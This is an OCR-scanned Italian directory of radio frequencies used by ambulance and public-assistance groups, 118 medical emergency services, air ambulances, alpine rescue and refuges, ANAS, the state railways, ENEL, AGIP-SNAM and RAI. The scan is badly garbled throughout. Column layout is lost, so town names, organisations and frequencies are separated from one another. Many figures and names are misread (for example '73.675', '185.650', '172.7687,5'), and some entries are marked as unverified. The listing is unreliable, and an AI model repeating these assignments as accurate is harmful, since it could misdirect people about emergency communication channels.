Oriolo Romano 
Ronciglione 
Soriano nel Cimino 
Tarquinia 
Tuscania 
Valentano 
Vasanello 
Vetralla 


172.937.5 173.037,5 


INTERO ELENCO FREQUENZE UTILIZZATE NELLA BANDA 


172.750 172.762,5 
172.925 172.937.5 
173.000 173.012,5 
173.075 173.087,5 
173.537,5 173.550 


172.5— 174 MHz 


172.787,5 
172.950 
173.025 
173.100 


173.562.5 


172.800 
172.962,5 
173.037,5 
173.125 


173.575 


172.900 
172.975 
173.050 
173.512,5 


173.750 


172.912,5 
172.987,5 
173.062.5 


173.525 


SERVIZI SANITA’ 
AMBULANZE 


CROCI ROSSA - PUBBLICHE ASSISTENZE - PRIVATE 
BANDE 156 —- 175 440-470MHz (servizi compresi nelle gamme civili VHF- UHF) 
LINK MASTER UHF - LIMITI DI BANDA 436 - 440 446 - 449 MHz 


(compresi nella gamma civile UHF) 


CROCI ROSSA PUBBLICHE ASSISTENZE 
L'ASSEGNAZIONE E UTILIZZO DEI CANALI DI LAVORO AVVIENE A LIVELLO PROVINCIALE 
PER OGNI BACINO DI UTENZA 


CROCE ROSSA ITALIANA 


ALCUNE PROVINCIE UTILIZZANO LA FREQUENZA A LORO ASSEGNATA 
COME EMERGENZA SANITARIA 118 


ASSEGNAZIONE CANALI FREQUENZE 
Provinciale 1 171.975 
Provinciale 13 (verificare) 171.987,5 
Provinciale 2 172.000 
Provinciale 3 173.250 
Provinciale 4 173.275 
Provinciale 5 173.300 
Provinciale 7: 173.312,5 
Provinciale 6 173.325 


CROCI PUBBLICHE ASSISTENZE 
COOPERATIVE PUBBLICHE ASSISTENZE 


ASSEGNAZIONE CANALI FREQUENZE 
Provinciale 1 173.175 
Provinciale 2 173.187,5 
Provinciale 3 173.200 
Provinciale 4 173.212,5 
Provinciale 5 173.225 
Nazionale 6 172.775 


CROCI PRIVATE 


VENGONO ANCHE RIPORTATE CROCI PUBBLICHE ASSISTENZE CHE UTILIZZANO FREQUENZE 
NON INSERITE NELLA CANALIZZAZIONE NAZIONALE ASSEGNATA 


LOCALITA’ ENTE FREQUENZE 
Acqui Terme (AL) Bianca 173.187,5 
Agrate Brianza (MI) Ambrosiana 460.012,5 
Alassio (SV) Bianca 173.100 
Albenga (SV) Bianca 173.100 
Albenga (SV) Rossa 173.100 
Albisola Superiore (SV) Verde 173.100 
Andora (SV) Bianca 173.100 
Arcola (SP) Verde 173.525 

Arese (MI) Misericordia 160.525 
Arluno (M1) Volontari 165.100 

Arma di Taggia (IM) Verde 173.125 
Badalucco (IM) Verde 173.125 
Baveri (GE) Azzurra 173.125 173.550 


Bergamo e prov. 
Besana Brianza (MI) 


non disponibile 
Bianca 


160.925 
162.475 460.012.5 


Beverino (SP) Bianca 173.525 

Biassono (Ml) Bianca 162.475 460.012,5 
Binasco (MI) Bianca 162.475 460.012,5 
Bogliasco (GE) Verde 173.125 173.550 


Bolano (SP) Pubblica Ass. Ceparana 173.525 

Bolzaneto (GE) Bianca 173.125 173.550 
Bonassola (SP) Azzurra 173.525 
Bordighera (IM) Rossa 173.125 173.275 
Borghetto di Vera (SP) Verde 173.525 

Borghetto Santo Spirito (SV) Bianca 173.100 

Borgio Verezzi (SV) Bianca 173.100 

Borzoli (GE) Azzurra 173.125 173.550 
Borzonasca (GE) Verde 173.500 

Bovisio Masciago (MI) Rossa 173.275 460.012,5 
Brescia Bianca 466.487,5 468.012,5 
Brasso (MI) Rossa 173.275 460.012,5 
Brugherio (MI) Bianca 162.475 460.012,5 
Brugherio (MI) Rossa 173.275 460.012,5 
Busalla (GE) Verde 173.125 173.550 
Cairo Montenotte (SV) Bianca 173.100 

Calizzano (SV) Azzurra 173.100 

Camogli (GE) Verde Camogliese 173.500 

Carasco (GE) Verde 173.500 

Carate Bnanza (MI) Bianca 162.475 

Cercare (SV) Bianca 173.100 

Carrara (MS) Misericordia 162.425 (da verificare) 
Carrara (MS) non disponibile 161.375 

Cerugate (MI) Bianca 162.475 

Caseina dè Pecchi (MI) Bianca 162.475 
Castelnuovo Magra (SP) Bianca 173.525 
Castiglione Chiavarese (GE) Verde 173.500 

Celle Ligun (SV) Rosa 173.100 

Cangio Bormida (SV) Rossa 173.100 

Ceriale (SV) Rossa 173.100 

Cernusco sul Naviglio (MI) Bianca 162.475 

Cervo (IM) D’Oro 173.125 

Cesena Maderno (MI) Bianca 162.475 460.012,5 


Champorcher (AO) 


non disponibile 


151.365 


Chiavari (GE) Verde Chiavarese 173.500 


Cinisello Balsamo (MI) Rossa 173.275 460.012,5 
Cologno Monzese (MI) Avis 161.250 
Comigliano Ligure (GE) Bianca 173.125 173.550 
Corsica (MI) Blu 161.225 

Corsico (MI) Verde A.P.M. 173.775 

Cosio di Arroscia (IM) Rossa 173.125 173.275 
Deiva Marina (SP) D’Oro 173.525 
Desenzano del Garda (BS) non disponibile 162.787,5 

Desio (MI) Rossa 173.275 460.012.5 
Diano Marina (IM) Rossa 173.125 173.275 
Dolceacqua (IM) Verde Intemelia 173.125 173.525 
Finale Ligure (SV) Bianca 173.100 

Finale Ligure (SV) Verde 173.100 

Firenze Azzurra 165.450 

Firenze Misericordia 161.675 171.650 
Foligno (PG) Croce Bianca 465.400 

Follo (SP) Rossa 171.975 173.525 
Fossola (MS) non disponibile 157.830 

Premura (SP) Pubblica Ass. Framurese 173.525 

Garlasco (PV) Garlaschese 165.200 

Genova Azzurra Cà Nove 173.125 173.550 
Genova Bianca del Soccorso 173 125 173.550 
Genova Bianca Genovese 173.125 173.550 
Genova Blu Castelletto 173 125 173.550 
Genova Celeste San Benigno 173.125 173.550 
Genova d’Oro 173.125 173.550 
Genova Verde (Forte Quezzi) 173.125 173.550 
Genova Verde (Genovese) 173.125 173.550 
Genova Vol. del Socc. (V.Fenice) 173.125 173.550 
Genova Vol. del Socc. (S. Anna) 173.125 173.550 
Genova Vol. del Socc. (S. Tecla) 173.125 173.550 
Genova Volontari (via Vesuvio) 173.125 173.550 
Genova Volontari San Giorgio 173.125 173.550 
Giussano (MI) Bianca 162.475 

Imperia Bianca 173.125 

Imperia Rossa 173.125 173.275 
Isoverde (GE) Verde 173.125 173.550 
La Spezia Bianca 173.525 

Le Spezia Rossa 171.975 173.525 
Legnano (MI) Bianca 162.475 

Lerici (SP) Rosso-Bianca 173.525 

Limbiate (MI) Argento 164.950 

Lissone (MI) Verde Lissonese 460.012,5 
Livorno non disponibile 171.825 

Livorno non disponibile 172,762,5 
Livorno non disponibile 173.775 

Lodi (provincia) non disponibile 160.575 

Loeno (SV) Rossa 173.100 

Lucca Misericordia 171.875 172.025 
Lumarzo (GE) Verde 173.125 173.550 
Magenta (MI) Bianca 162.475 

Menano Comense (CO) Bianca 162,475 

Massa Misericordia 161.025 
Melegnano (MI) Bianca 162.475 

Melzo (MI) Bianca 162.475 
Mignanego (GE) Bianca 173.125 173.550 
Milano Ambrosiana 161 075 

Milano Bianca 162 475 

Milano Intervol 161.262,5 

Milano Maria Bambina 161.250 

Milano Misericordia 161.025 


Milano 

Milano 

Milano 

Milano 

Milano 

Milano 

Milano 

Milano 

Milano 

Milano 

Milano 

Milano 

Molassana Alta (GE) 
Moneglia (GE) 
Monterosso al Mare (SP) 
Monza (MI) 

Muggiò (MI) 

Ne (GE) 

Nervi (GE) 

Nizza Monferrato (AT) 
Noli (SV) 

Nova Milanese (MI) 
Novara 

Novara 

Ospedaletti (IM) 
Ovada (AL) 

Paderno Dugnano (MI) 
Padova 

Paullo (MI) 

Pegli (GE) 

Pero (MI) 

Peschiera Borromeo (MI) 
Pietre Ligure (SV) 
Pieve di Teco (IM) 
Pieve Emanuele (MI) 
Pinerolo (TO) 

Pino (GE) 

Piombino (LI) 

Pisa 

Pisa 

Pisa 

Pisa e prov. 

Pisa e prov. 

Pistoia 

Pontedassio (IM) , 
Pornassio (IM) 
Portofino al Mare (GE) 
Prà (GE) 

Prato 

Quarto dei Mille (GE) 
Quinto al Mare (GE) 
Repallo (GE) 

Recco (GE) 

Reggio Emilia 

Riccò del Golfo (SP) 
Riverolo (GE) 
Rozzano (Ml) 
Sampierdarena (GE) 
San Remo (IM) 

San Remo (IM) 

San Desiderio (GE) 
San Donato Milanese (MI) 


D’Oro 

Rosa Celeste 
Samaritana 

San Carlo 

Santa Rita 

Sos 

Sos Lambrate 
Verde A.P.M. 
Viola 

non disponibile 
non disponibile 
non disponibile 
Pubblica Assistenza 
Azzurra Monegliese 
Bianca 

Rossa 

Rossa 

Verde 

Pubblica Assistenza 
Verde 

Bianca 

Rossa 

non disponibile 
non disponibile 
Bianca 

Verde Ovadese 
Rossa 

Verde 

Bianca 

Verde 

Astra Radio Soccorso 
Bianca 

Rossa 

Rossa 

Bianca 

Verde 

Bianca 

non disponibile 
Misericordia 

non disponibile 
non disponibile 
non disponibile 
non disponibile 
Misericordia 
Rossa 

Bianca 

Pubblica Assistenza 
Verde 
Misericordia 
Verde 

Verde 

Bianca Rapallese 
Verde 

Verde 

Rossa 

Rosa Rivarolese 
Viola 

d’Oro 

Bianca 

Pubblica Ass. Volontari 
Bianca 

Gialla 


160.362,5 162.537,5 163.075 (simulcast) 
161.050 

160 375 
160.212,5 
161.375 
164.775 
173.775 
173.775 
173.775 
160.137,5 
160.525 
165.287,5 
173.125 173.550 
173.500 
173.525 
173.275 460.012,5 
173.275 460.012,5 
173.500 
173.125 173.550 
165.050 
173.100 
173.275 460.012,5 
161.675 

173.775 
173.125 173.525 
160.837,5 
173.275 460.012.5 
161.125 
162.475 
173.125 173.550 
161.075 
162.475 
173.100 
173.125 173.275 
162.475 
173.162,5 
173,125 173.550 
163.475 
163.575 
171.600 
172.762,5 
173.125 
173.550 
161.875 171.675 
173.125 173.275 
173.125 
173.500 

173.125 173.550 
161.875 171.875 
173.125 173.550 
173.125 173.550 
173.500 

173.125 173.550 
161.125 

171.975 173.525 
173.125 173.550 
173.775 
173,125 173.550 
173.125 173 525 
173.125 173.525 
173.125 173.550 
165.267,5 


San Giuliano Milanese (MI) 
San Pietro all’Olmo (MI) 
San Quirico (GE) 

San Valentino Multa (BZ) 
SantAngelo Lodigiano (LO) 
Santa Margherita Ligure (GE) 
Santo Stefano al Mare (IM) 
Santo Stefano di Magra (SP) 
Saronno (VA) 

Sarzana (SP) 

Sassello (SV) 

Savona 

Savona 

Sciarborasca (GE) 

Senago (MI) 

Senigallia (AN) 

Seregno (MI) 

Sesta Godano (SP) 

Sesto San Giovanni (MI) 
Sestri Levante (GE) 

Sestri Ponente (GE) 

Seveso (MI) 

Siena 

Spotorno (SV) 

Struppa (GE) 

Taggia (IM) 

Torino 

Torrazza (GE) 

Trezzo sull’ Adda (MI) 
Vado Ligure (SV) 
Vallecrosia (IM) 
Vallecrosia (IM) 
Vallecrosia (IM) 

Valsecca (GE) 

Varazze (SV) 

Varedo (MI) 

Varese Ligure (SP) 
Ventimiglia (IM) 

Vernazza (SP) 

Viareggio (LU) 


Bianca 
Verde 
Rosa 


Bianca Val Venosta 


Bianca 


Verde Sanmargheritese 


Rossa 

Rossa 
Argento 
Rossa 

Rossa 
Bianca 
Rossa 

d’Oro 

P.a.s. 

Misa Soccorso 
Volontari 
Rossa 

S.0s. 

Verde 

Verde 
Bianca 
Misericordia 
Bianca 
Bianca 
Rossa 
Bianca 
Bianca 
Azzurra 
Rossa 
Azzurra 
Verde Intemelia 
Rossa 
Bianca 
Rossa 

Rossa 

Rossa 

Rossa 

Verde 
Misericordia 


162.475 

161.050 

173.125 173.550 
163.350 

162.475 

173.500 

173.125 173.275 
171.975 173.525 
164.950 

171.975 173.525 
173.100 

173.100 

173.100 

173.125 173.550 
163.525 

163.550 

160.425 

171.975 173.525 
173.775 

173.500 

173.125 173.550 
162.475 

165.700 o 166.700 
173.100 

173.125 173.550 
173.125 173.275 
163.475 

173.125 173.550 
460.012.5 
173.100 

173.125 173.525 
173.125 173.525 
173.125 173.275 173.525 
173.125 173.550 
173.100 

173.275 480.012,5 
171.975 173.525 
173.125 173.275 
173.525 

163.400 


SANITA’ 
EMERGENZA SANITARIA 
BANDE 156-175 460-470 MHz (servizi compresi nelle gamme civili VHF-UHF) 
LINK MASTER UHF - LIMITI DI BANDA 436 - 440 445-449 MHz 
(compresi nella gamma civile UHF) 
L’ASSEGNAZIONE E UTILIZZO DELLE FREQUENZE DI LAVORO AWIENE A LIVELLO 


PROVINCIALE 
PER OGNI BACINO DI UTENZA 


LOCALITA ENTE FREQUENZE 

Abano Terme (PD) Guardia Medica 173.550 

Adria (RO) Delta Soccorso 173.550 

Alessandria Emergenza Sanitaria 118 (freq. CRI) 173.275 

Ancona Marche Soccorso 173.225 

Aosta Emergenza Sanitaria 118 (da verificare) 181.575 

Assisi (PG) Pronto Soccorso (Ospedale) 160.250 

Asti Emergenze Sanitaria 118 (freq. CRI) 173.275 

Avigliana (TO) Centro Soccorso 162.387,5 

Badalucco (IM) Guardia Medica 173.525 

Belluno Emergenza Sanitaria 116 446.850 

Bergamo Emergenza Sanitaria 118 (freq. CRI) 173.300 

Biella Emergenza Sanitaria 118 162.037,5 

Biella Guardia Medica 162.050 

Bologna Bologna Soccorso 118 160.650 165.650 165.725 
Bordighera (IM) Pronto Soccorso 173.125 

Borgo San Dalmazzo (CN) Centro Unico Soccorso 160.675 

Bosco Marengo (AL) Guardia Medica 173.400 

Brescia Emergenza Sanitaria 118 (freq. CRI) 171.975 

Cagliari Guardia Medica 162.225 

Caluso (TO) Guardia Medica 162.150 

Castiglione del Lago (PG) Pronto Soccorso (Ospedale) 161.700 

Catania Emergenza Sanitaria 118 172.000 

Cesena (FO) Cesena Soccorso 118 165.775 

Como Emergenza Sanitaria 118 172.775<>173.600 (simulcast) 
Cremona Emergenza Sanitaria 118 173.095 

Cuneo Emergenza Sanitaria 118 (freq. CRI) 173.325 

Desio (MI) Guardia Medica 460.012.5 

Ferrara Ferrara Soccorso 118 165.675 

Firenze Firenze Soccorso 118 173.175 

Firenze non disponibile 171.825 171.850 

Foligno (PG) Pronto Soccorso (Ospedale) 163.550 

Forlì Forlì Soccorso 118 165.650 

Genova Genova Soccorso - 118 173.125 173.500 173.550 
Genova Guardie Medica 173.550 

Gorizia Emergenza Sanitaria 118 173.125 173.512,5 (verificare) 
Imperia Imperia Soccorso 118 173.125 

Imperia Pronto Soccorso 173.125 

Le Spezia Le Spezia Soccorso 118 173.525 

Le Spezia Guardia Medica 173.525 

Lecco Emergenza Sanitarie 118 172.775<>173.600 (simulcast) 


Livorno Emergenza Sanitaria 118 173.775 


Locate Triulzi (MI) 
Lodi 

Lodi (provincia) 
Lucca 

Macerata 
Mantova 
Mestre (VE) 
Modena 
Mondovì (CN) 
Monza (MI) 
Monza (MI) 
Napoli 

Novara 
Omegna (VB) 
Padova 

Padova 

Padova 
Palermo 

Parma 

Pavia 

Perugia 
Piacenza 

Pisa 

Pordenone 
Rapallo (GE) 
Ravenna 
Reggio Emilia 
Rho (MI) 

Rho (MI) 
Rimini 

Rovigo 
Sanremo (IM) 
Sarzana (SP) 
Sassello (SV) 
Savigliano (CN) 
Savona 

Savona 

Seregno 

Sesto San Giovanni (MI) 
Siena 

Sondrio 

Susa (TO) 
Torino 

Torino 

Torino 

Torino 

Torino provincia 
Torino provincia 
Trento 

Treviso 

Trieste 

Udine 

Valle Susa (TO) 
Varazze (SV) 
Varese 

Varese (provincia) 
Venezia 
Ventimiglia (IM) 
Verbania 
Vercelli 
Vercelli 


Pronto Intervento Locatese 
Emergenza Sanitaria 116 
Guardia Medica 


Emergenza Sanitaria 118 (da verificare) 


Macerata Soccorso 118 

Emergenza Sanitaria 118 
Emergenza Sanitaria 118 

Modena Soccorso 118 

non disponibile 

Emergenza Sanitaria 118 

Guardia Medica 

Taxi Sanitario 

Emergenza Sanitaria 118 (freq. CRI) 
Guardia Medica 

Emergenza Sanitaria 118 

Guardia Medica 

non disponibile 

Taxi Sanitario 

Parma Soccorso 118 

Emergenza Sanitaria 118 (freq. CRI) 
Pronto Soccorso (Ospedale) 
Piacenza Soccorso 118 


Emergenza Sanitaria 118 (da verificare) 


Emergenza Sanitaria 118 
Guardia Medica 

Ravenna Soccorso 118 
Reggio Emilia Soccorso 118 
Rho Soccorso 

Guardia Medica 

Rimini Soccorso 118 
Emergenza Sanitaria 118 
San Remo Soccorso 118 
Guardia Medica 

Pronto Soccorso 

non disponibile 

Savona Soccorso 118 
Guardia Medica 

Seregno Soccorso 

Guardie Medica 

Siena Soccorso 118 
Emergenza Sanitaria 118 (freq. CRI) 
Susa Soccorso 

Torino Soccorso 118 
Emergenza Sanitaria 118 
Guardie Medica 

Servizio Medico domiciliare 
Emergenza Sanitaria 118 (freq. CRI) 
Emergenza Sanitaria 118 
Emergenza Sanitaria 118 
Emergenza Sanitaria 118 
Emergenze Sanitaria 118 
Emergenza Sanitaria 118 
Guardia Medica 

Guardia Medica 

Emergenza Sanitaria 118 (freq. CRI) 
Servizio Medico domiciliare 
Emergenza Sanitaria 118 
Ventimiglia Soccorso 118 
Emergenza Sanitaria .118 
Emergenza Sanitaria 118 
Guardia Medica 


442.100 

460.137,5 

160.575 

171.850 

163.275 

165.300 

172.787,5 

166.900 

162.375 

460.012,5 

460.012,5 

173.700 

171.975 

173.225 

173.10625 

165.775 

161.650 

172.775 

165.725 172.800 
173.325 

161.600 

165.650 173.550 (nuova freq.) 
171.800 

172.7687,5 173.7187,5 
173.500 

165.626 

165.625 173.250 (freq. CRI) 
173.175 

165.025 

165.775 

173.550 

173.525 

173.525 

173.100 

162.150 

173.100 

173.100 

460.012,5 

161.675 

161.025 

173.250 

173.537,5 

467.125 

173.493,75 

467.500 

162.137,5 

172.000 

460.250 (prossima attivazione) 
161.800 161.625 161.850 
165.675 173.493.75 
172.806,250 173,500 
173.737,5 173.118,75 (verif.) 
173 537,5 

173.100 

171.975 

440.700 

165.700 172.787.5 
173.525 

173.493,75 

163.800 

165.862.5 


Verona Verona Emergenza 118 172.770 
Viareggio (LU} Emergenza Sanitaria 118 (da verificare) 171.850 
Zanica (BG) Zanica Soccorso 161.987,5 


SANITA’ 


ELISOCCORSO - ELIAMBULANZA 


BANDE 156- 175 440 - 470 MHz (servizi compresi nella gamme civili VHF- UHF) 


L'ASSEGNAZIONE E UTILIZZO DELLE FREQUENZE DI LAVORO AVVIENE A LIVELLO 


LOCALITA' 


Alessandria 


Alta Val Venosta (BZ) 


Ancona 
Aosta 

Ascoli Piceno 
Asti 
Bergamo 
Biella 
Bologna 
Bologna (Reno) 
Bolzano 
Bressanone (BZ) 
Como 

Cuneo 
Ferrara 

Forli 

Genova 
Gorizia 
Imola (BO) 
Imperia 

La Spezia 
Lecco 
Macerata 
Mantova 
Milano 
Modena 
Novara 
Parma 

Pesaro 
Piacenza 
Pieve di Cadore (BL) 
Ravenna 
Reggio Emilia 
Rimini 

Roma 
Savona 

Solda (BZ) 
Sondrio 
Torino 
Trento 
Treviso 
Trieste 

Udine 
Venezia 
Verbania 


PROVINCIALE 
PER OGNI BACINO DI UTENZA 


FREQUENZE 


173.493,75 

163.100 

173.225 

165.875 171.500 171.550 
173.225 

173.493,75 

173.300 

173.493,75 

165.725 

185.650 

163.450 164.575 (Soccorso Alpino) 160.500 (Catores Val Gardena) 
165.250 

172775 (Lario Soccorso) 
173.493,75 

165.675 

165.900 

73.675 (Vigili del Fuoco) 173.125 173.550 
173.126 

165.775 

173.125 

173.525 

172.775 (Lario Soccorso) 
173.225 

165.300 

165.300 

165.650 

173.493,75 

165.725 172.800 

173.225 

165.675 

161.212,5 161.750 
165.625 

165 625 

165.675 

135.250 (freq. aeronautica) 
173.100 

164.000 

173.250 

173.493,75 

161.600 161.825 161.850 
165.675 

173.500 (sede Udine) 
173.737,5 

155.675 

173.493,75 


SOCCORSO ALPINO 


RIFUGI ALPINI - GUIDE ALPINE - FUNIVIE 


BANDA VHF 166.025 - 166.475 MHz BANDA UHF 446.050 - 447.450 MHz 


(servizi compresi nelle gamme civili VHF-UHF) 


BANDA VHEF 68.0 - 72.0 MHz 


IN QUESTA BANDA SONO OPERATIVI SERVIZI CON UTILIZZAZIONE A LIVELLO LOCALE 


68.750 


71.250 
71,500 


71.550 
146.660 


169.812,5 


DI FREQUENZE PER SOCCORSO ASSEGNATE PER OGNI BACINO DI UTENZA 


Per impiego in operazioni di soccorso su tutto il territorio nazionale 
fatta eccezione per la sola regione Valle d'Aosta 

Savigliano (CN) 
Per impiego in operazioni di soccorso su tutto il territ orio nazionale 

anche per collegamenti con elicotteri di soccorso 
Per impiego in operazioni di soccorso per la sola regione Valle d’ Aosta 

Per impiego in operazioni di soccorso su tutto il territorio nazionale 
(da verificame effettivo utilizzo in interventi di emergenza e soccorso) 
CAI. Per impiego in operazioni di emergenza e soccorso su tutto il territorio nazionale 


LOCALITA’ CON FREQUENZE OPERATIVE ADIBITE ALL’EMERGENZA E SOCCORSO 


145.900 
146.410 
146.410 
146.500 
146.700 
156.135 
158.625 
160.425 
160.462,5 
162.525 
163.350 
164.000 
164.035 
165.150 
165.250 
166.650 
166.925 
173.562,5 


BANDA VHF (servizi compresi nella gamma cIvile) 
Presanella 
Edolo (BS) 
Ponte di Legno (BS) 
Passo Oclini (TN) 
Tonale (TN) 
Alpe Devero (VB) 
Vallese 
Alpe Siusi 
Trento 
Val Gardene 
La Thuille (AO) 
Alto Adige 
Valle del Po 
Bormio (SO) 
Alpe Cermis (TN) 
Alagna Valsesia (VC) 
Sondalo (SO) 
Massa (località appenniniche nella provincia) 


RIFUGI ALPINI 


I RIFUGI RIPORTATI SONO DOTATI DI APPARECCHIO 


RIFUGIO 


Monte Aiona 
Monte Bue 


RADIOTELEFONICO DI EMERGENZA 


REGIONE PROV FREQUENZE 


Liguria GE 446.550 
Liguria GE 446.900 


Pra Riondo 
Albani 

Berni 

Bonetta 

Capanna 

Casati G -Guasti A. 
Coca 

Curò 

Garibaldi 
Lissone 
Menaggio 

Porro A-Geni A.e M. 
Rosa Marco 
Tonolini 

Aprimo O. CAI 
Balma 

Barbara 

Bianco 

Bolzano 

Ca dAsti 
Capanna Renata 
Cibrario 

Città di Busto 
Daviso CAI 
Federico F.- Marchesini E 
Genova 

Il Truc 

La Balma 

Lowrie B. GAI 
Mombarone 
Morelli 

Mucrone 

Pagani 

Piano del Re 
Questa 
Remondino CAI 
Rosazza 

Salvin 

Sorta 

Tazzetti E. 
Vaccarone L. 
Biasi 

Brentari 

Carà Alto 
Coronelle 
Fraccaroli M. 
Mantova 

Pedrotti alla Tosa 
Aosta 

Barba G. - Ferrero L. 
Benevolo CAI 
Bertone G. 

Bezzi CAI 
Boccalatte 
Chabot 

Città di Chivasso 
Chiarella 

Città di Mantova 
Città di Vigevano 
Col Collon-Nacamuli A. 
Cretea Seches 
Daffeyes A. 


Liguria 

Lombardia 
Lombardia 
Lombardia 
Lombardia 
Lombardia 
Lombardia 
Lombardia 
Lombardia 
Lombardia 
Lombardia 
Lombardia 
Lombardia 
Lombardia 
Piemonte 

Piemonte 

Piemonte 

Piemont 

Piemone 

Piemote 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte. 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Piemonte 

Trentino Alto Adige 
Trentino Alto Adige 
Trentino Atto Adige 
Trentino Alto Adige 
Trentino Alto Adige 
Trentino Alto Adige 
Trentino Alto Adige 
Valle d’ Aosta 

Valle dAosta 

Valle d'Aosta 

Valle d'Aosta 

Valle d'Aosta 

Valle d’ Aosta 

Valle d’ Aosta 

Valle dAosta 

Valle d'Aosta 

Valle d'Aosta 

Valle dAosta 

Valle d'Aosta 

Valle dAosta 

Valle d'Aosta 


HHAO H1OOOOOFAOTdFHO0AHdH090 
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BZ? 


PEPPPPE 
0000004 


AO 


447.050 
166.125 
446.250 
166.325 


446 400 446.550 
163 650 446.900 


166 225 
166 375 


166.375 446.450 


147.650 
141.250 
147.000 
147.000 
146.660 
166.325 
446.400 
446 550 
446.450 
446.100 
446.250 
446 100 
446 200 
146 650 
446 100 
446 550 
446 250 
447 350 
166.325 
446 550 
446 900 
446 200 
446.250 
446.550 
166.325 
446.450 
446.250 
446.250 
446.500 
447 350 
446.400 
446.500 
446.250 
166.425 
146.440 
160 950 
446 550 
1 55.860 
168 925 link 
447 350 
446 250 
446 100 
446 500 
446.250 
446.100 
446.550 
446.250 
446.200 
446.500 
447.350 
446.250 
446 400 
447.150 


Dalmazzi 

Delle Roccie 

Duca Degli Abruzzi 
Elisabetta 
Emmanuelle V. 
Prarayer 

Savoia 

Sella Q. 

Sella V. CAI 
Torino Vecchio CAI 
Averau 

Bassano 

Biella 


Croda da Lago - Palmieri G. 


Lobbia 

Papa A. 
Telegrafo 
Alpe Pratetto 
Boval 
Carosello 
Coazze 
Delle Roccie 
Mandronte 
Monpantero 
Sciliar TCI 


NON VENGONO UTILIZZATE FREQUENZE CON ASSEGNAZIONE MINISTERIALE 


LOCALITA' 


Bormio 
Brescia 
C.A.S. 
Cervino 
Courmayeur 
Gardena 
Macugnaga 
Ponte di Legno 
San Martino 
Val Camonica 
Val di Fessa 


NON VENGONO UTILIZZATE FREQUENZE CON ASSEGNAZIONE MINISTERIALE 


LOCALITA’ 


Gran Montein 
Monte Bianco 
Val Strona 
Val Torta 

Val Veny 


Valle d'Aosta A0 
Valle d'Aosta AO 
Valle d'Aosta A0 
Valle d'Aosta AO 
Valle d'Aosta A0 
Valle dAosta A0 
Valle d’ Aosta AO 
Valle d'Aosta A0 
Valle dAosta A0 
Valle d'Aosta AO 
Veneto BL 
Veneto VIoOTV 
Veneto BL 
Veneto BL 
Veneto VIo VR 
Veneto VI 
Veneto VR 
non identiticata 
non identificata 
non identificata 
non identificata 
non identificata 
non identificata 
non identificata 
non identificata 

GUIDE ALPINE 


FUNIVIE 


PROV 


SO 


BS 


AO 


VB 
BS 


446.200 
447.050 
447.350 
446.250 
166.225 
446.550 
447.350 
446.250 
446.250 
447.050 
446.250 
447150 

166.425 
166.125 
146.350 
166.325 
446.200 
446.550 
160.000 
446.900 
446.500 
447.050 
146.150 
447.350 
156.675 


FREQUENZE 


166.100 
146.800 
150.200 
156.800 
155.035 
160.500 
141.650 
147.650 
146.100 
147.650 
146.100 


FREQUENZE 


156.195 
156.625 
160.667,5 
160 687,5 
156.275 


AZIENDA NAZIONALE AUTONOMA STRADE STATALI 


A.N.A.S. 


BANDA 465 - 470 MHz (servizi compresi nella gamma civile UHF) 


L'ASSEGNAZIONE E UTILIZZO DEI CANALI DI LAVORO AWIENE A LEVELLO PROVINCIALE 


465.175 
465.250 
465.275 
465.300 
465.350 
465 450 
465.550 
465.625 
465.675 
466.900 


PER OGNI BACINO Di UTENZA 


NELLA REGIONE LOMBARDIA IL SERVIZIO VIENE ATTUATO SULLE SEGUENTI FREQUENZE 


Bergamo 
Brescia 
Como 
Cremona 
Lecco 
Lodi 
Mantova 
Milano 
Pavia 
Sondrio 
Varese 


438.600 
non disponibile 
437.600 
437.875 
437.600 
non disponibile 
437.875 
465.550 
non disponibile 
non disponibile 
non disponibile 


FERROVIE DELLO STATO 
F.S. 


BANDA 440- 444 MHz (servizi compresi nella gamma civile UHF) 


SONO OPERATIVI INOLTRE NEI PRINCIPALI SCALI FERROVIARI CON ASSEGNAZIONE 
PER ZONA TERRITORIALE SERVIZI OPERANTI IN GAMMA CIVILE VHEF 


COORDINAZIONE MOVIMENTO - COMPOSIZIONE CONVOGLI - SMISTAMENTO CARROZZE 


ASSEGNAZIONE NAZIONALE PER SERVIZI OPERANTI IN GAMMA CIVILE UHE 


440.025 
440.100 
440.125 
440.175 
440.200 
440.225 
440.250 
440.425 
440.475 
440.575 
440.675 
440.775 
440.825 
440.875 
440.900 
440.975 
441.075 
441.175 
441.200 
441.250 
441.325 
441.350 
441.425 
441.525 
441.675 
441.850 
441.900 
441.950 
442.000 
442.025 
442.150 
442.200 
442.225 
442.850 
442.900 
444.000 


ENTE NAZIONALE ENERGIA ELETTRICA 
ENEL 


BANDA 163.6 - 164.6 MHz 


L'ASSEGNAZIONE E UTILIZZO DEI CANALI DI LAVORO AWIENE A LIVELLO PROVINCIALE 
PER OGNI BACINO DI UTENZA 


163.600 
163 625 
163.650 
163.675 
163.700 
163.725 
163.750 
163.775 
163.800 
163.625 
163.850 
163.875 
163.900 
163.925 
163.950 
163.975 
164.000 
164.025 
164.050 
164.075 
164.100 
164.125 
164.150 
164.175 
164.200 
164.225 
164.250 
164.275 
164.300 
164.325 
164.350 
164.375 
164.400 
164.425 
164.450 
164.475 
164.500 
164.525 
164.550 
164.575 
164.600 


ENTE NAZIONALE IDROCARBURI 


AGIP - SNAM 


BANDA 172 - 172.6 MHz 


LASSEGNAZIONE E UTILIZZO DEI CANALI DI LAVORO AWIENE A LIVELLO LOCALE 
PER OGNI BACINO DI UTENZA 


CANALI FREQUENZE 
01 172.100 
02 172.125 
03 172.150 
04 172.175 
05 172.200 
06 172.225 
07 172.250 
06 172.275 
09 172.300 
10 172.325 
11 172.350 
12 172.375 
13 172.400 
14 172.425 
15 172.450 
16 172.475 
17 172.500 
18 172.525 
19 172.550 
20 172.575 
21 172.600 
22 172.112.5 
23 172.137,5 
24 172.162,5 
25 172.187,5 


26 172.212,5 


RADIO TELEVISIONE ITALIANA 


BANDA 223 - 231.8 469.325 - 470 MHz 


RIPRESE SQUADRE ESTERNE RADIO - MICROFONO 
223.000 canale 0 469.325 canale 0 
223.700 canale 1 469.325 canale 1 
224.200 canale 2 469375 canale 2 
224.600 canale 3 469.425 canale 3 
225.100 canale 4 469.450 canale 4 
225.700 canale 5 469.500 canale B 
226.200 canale 6 469.575 canale 5 
226.700 canale 7 469 675 canale 6 
